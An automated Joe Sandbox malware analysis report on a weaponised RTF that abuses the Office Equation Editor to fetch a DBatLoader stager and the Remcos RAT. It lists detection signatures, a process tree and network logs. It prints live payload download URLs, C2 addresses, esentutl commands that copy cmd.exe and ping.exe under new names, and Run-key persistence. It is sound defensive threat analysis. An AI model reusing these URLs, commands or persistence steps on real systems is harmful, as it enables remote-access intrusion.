Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
K0hpP6V2fo.rtf

Overview

General Information

Sample name:K0hpP6V2fo.rtf
renamed because original name is a hash value
Original sample name:7a9a05109dd848058fd327bc38459a3d.rtf
Analysis ID:1517947
MD5:7a9a05109dd848058fd327bc38459a3d
SHA1:a086488bd204ca42e9d522b769b94c9467ad5520
SHA256:9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2
Tags:rtfuser-abuse_ch
Infos:

Detection

DBatLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Equation Editor Network Connection
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3536 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3620 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • audiodg.exe (PID: 3780 cmdline: "C:\Users\user\AppData\Roaming\audiodg.exe" MD5: BBF710C83246092A538128620853D4FD)
        • cmd.exe (PID: 3860 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" " MD5: AD7B9C14083B52BC532FBA5948342B98)
          • esentutl.exe (PID: 3884 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: D2DB315B866148D6AAA9E0B3AB31B011)
          • esentutl.exe (PID: 3904 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: D2DB315B866148D6AAA9E0B3AB31B011)
        • esentutl.exe (PID: 3916 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Roaming\audiodg.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /o MD5: D2DB315B866148D6AAA9E0B3AB31B011)
        • SndVol.exe (PID: 3940 cmdline: C:\Windows\System32\SndVol.exe MD5: 2305BFF2966D73694972FD7531BC5BAA)
    • EQNEDT32.EXE (PID: 3200 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • Qzzgbhha.PIF (PID: 3280 cmdline: "C:\Users\Public\Libraries\Qzzgbhha.PIF" MD5: BBF710C83246092A538128620853D4FD)
    • SndVol.exe (PID: 3052 cmdline: C:\Windows\System32\SndVol.exe MD5: 2305BFF2966D73694972FD7531BC5BAA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://maan2u.com/doc/233_Qzzgbhhaaml"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
K0hpP6V2fo.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x14e7:$obj2: \objdata
  • 0x14ff:$obj3: \objupdate
  • 0x14c3:$obj6: \objlink

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6c4d0:$a1: Remcos restarted by watchdog!
        • 0x6ca48:$a3: %02i:%02i:%02i:%03i
        00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          Click to see the 7 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.audiodg.exe.2d20000.3.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            5.2.audiodg.exe.2d20000.3.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              5.2.audiodg.exe.2d20000.3.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                5.2.audiodg.exe.2d20000.3.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  5.2.audiodg.exe.2d20000.3.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0xf1948:$a1: Remcos restarted by watchdog!
                  • 0xf1ec0:$a3: %02i:%02i:%02i:%03i
                  Click to see the 2 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 107.175.243.142, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3620, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3620, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exe

                  System Summary

                  barindex
                  Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\audiodg.exe, ProcessId: 3780, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3620, Protocol: tcp, SourceIp: 107.175.243.142, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Execution from Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Qzzgbhha.PIF, NewProcessName: C:\Users\Public\Libraries\Qzzgbhha.PIF, OriginalFileName: C:\Users\Public\Libraries\Qzzgbhha.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , ProcessId: 3280, ProcessName: Qzzgbhha.PIF
                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Qzzgbhha.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\audiodg.exe, ProcessId: 3780, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Qzzgbhha
                  Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                  Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\audiodg.exe" , CommandLine: "C:\Users\user\AppData\Roaming\audiodg.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\audiodg.exe, NewProcessName: C:\Users\user\AppData\Roaming\audiodg.exe, OriginalFileName: C:\Users\user\AppData\Roaming\audiodg.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3620, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\audiodg.exe" , ProcessId: 3780, ProcessName: audiodg.exe
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\audiodg.exe" , CommandLine: "C:\Users\user\AppData\Roaming\audiodg.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\audiodg.exe, NewProcessName: C:\Users\user\AppData\Roaming\audiodg.exe, OriginalFileName: C:\Users\user\AppData\Roaming\audiodg.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3620, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\audiodg.exe" , ProcessId: 3780, ProcessName: audiodg.exe
                  Sigma detected: System File Execution Location Anomaly
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\audiodg.exe" , CommandLine: "C:\Users\user\AppData\Roaming\audiodg.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\audiodg.exe, NewProcessName: C:\Users\user\AppData\Roaming\audiodg.exe, OriginalFileName: C:\Users\user\AppData\Roaming\audiodg.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3620, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\audiodg.exe" , ProcessId: 3780, ProcessName: audiodg.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Qzzgbhha.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\audiodg.exe, ProcessId: 3780, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Qzzgbhha
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Qzzgbhha.PIF, NewProcessName: C:\Users\Public\Libraries\Qzzgbhha.PIF, OriginalFileName: C:\Users\Public\Libraries\Qzzgbhha.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , ProcessId: 3280, ProcessName: Qzzgbhha.PIF
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3620, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Office Macro File Creation
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3536, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T09:43:26.396591+020020220501A Network Trojan was detected107.175.243.14280192.168.2.2249163TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-25T09:43:26.488041+020020220511A Network Trojan was detected107.175.243.14280192.168.2.2249163TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://107.175.243.142/340/audiodg.exeAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 5.0.audiodg.exe.400000.0.unpackMalware Configuration Extractor: DBatLoader {"Download Url": ["https://maan2u.com/doc/233_Qzzgbhhaaml"]}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exeReversingLabs: Detection: 31%
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeReversingLabs: Detection: 31%
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFReversingLabs: Detection: 31%
                  Multi AV Scanner detection for submitted file
                  Source: K0hpP6V2fo.rtfReversingLabs: Detection: 47%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTR
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\audiodg.exeJoe Sandbox ML: detected
                  Source: C:\Users\Public\Libraries\Qzzgbhha.PIFJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\audiodg[1].exeJoe Sandbox ML: detected
                  Source: audiodg.exe, 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_e31da41f-7

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 5.2.audiodg.exe.2d20000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.402155278.000000007DB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.400349163.0000000002DA7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: audiodg.exe PID: 3780, type: MEMORYSTR
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 107.175.243.142 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodg.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodg.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownHTTPS traffic detected: 112.137.173.77:443 -> 192.168.2.22:49165 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb,$ source: esentutl.exe, 00000008.00000003.393771298.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.8.dr
                  Source: Binary string: easinvoker.pdb source: audiodg.exe, 00000005.00000002.401375610.000000000DA67000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DACA000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.379716518.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400314447.0000000002D4E000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DA97000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400087627.0000000001DD6000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbH source: audiodg.exe, 00000005.00000003.390927874.000000007EE10000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.390871016.000000007DDE0000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.402465873.000000007E4A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: audiodg.exe, 00000005.00000002.401375610.000000000DA67000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DACA000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401732992.000000000EB20000.00000004.00000800.00020000.00000000.sdmp, audiodg.exe, 00000005.00000003.379716518.000000007ED00000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400314447.0000000002D4E000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401732992.000000000EB4F000.00000004.00000800.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.401375610.000000000DA97000.00000004.00001000.00020000.00000000.sdmp, audiodg.exe, 00000005.00000002.400087627.0000000001DD6000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: esentutl.exe, 00000008.00000003.393771298.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.8.dr
                  Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.395779355.0000000000550000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.9.dr

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: global trafficDNS query: name: maan2u.com
                  Source: global trafficDNS query: name: maan2u.com
                  Source: global trafficDNS query: name: maan2u.com
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 107.175.243.142:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 112.137.173.77:443
